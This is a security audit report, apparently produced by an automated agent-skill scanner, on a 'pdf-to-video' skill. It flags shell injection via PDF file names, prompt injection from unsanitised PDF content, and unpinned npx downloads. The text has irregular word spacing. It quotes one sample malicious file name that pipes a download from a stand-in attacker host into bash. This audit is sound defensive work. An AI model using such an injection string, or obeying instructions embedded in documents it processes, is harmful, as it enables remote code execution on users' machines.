pdf-to-video
Fail
Audited by Gen Agent Trust Hub on Feb 16, 2026
Risk Level: HIGHCOMMAND_EXECUTIONREMOTE_CODE_EXECUTIONPROMPT_INJECTIONEXTERNAL_DOWNLOADS
Full Analysis
- [COMMAND_EXECUTION] (HIGH): The skill execute s shel l command s constructe d wit h the
<name>variabl e derive d from the PD F file name. Lack of sanitizatio n allow s a n attacke r to perform shel l injectio n (e.g., usin g a file name lik efile;cur l attacker.com|bash;). - [PROMPT_INJECTION] (HIGH): Vulnerabl e to Indirect Promp t Injectio n (Categor y 8). 1. Ingestio n point s: Read s untruste d conten t from loca l PD F file s provide d by user s. 2. Boundar y marker s: Absen t; the re are no delimiter s or instruction s to ignor e embed de d command s. 3. Capabilit y inventor y: Shel l executio n (
npx), file copyin g (cp), and file writin g. 4. Sanitizatio n: None; extracte d data is use d directl y in confi g file s and shel l command s. - [EXTERNAL_DOWNLOADS] (MED IUM): Use s
npx remotio n render, whic h download s and execute s the 'remotio n' packag e from np m at runtime, creatin g a depen denc y on externa l thir d-part y code withou t versio n pinnin g or integrit y check s.
Recommendations
- AI detected serious security threats
Audit Metadata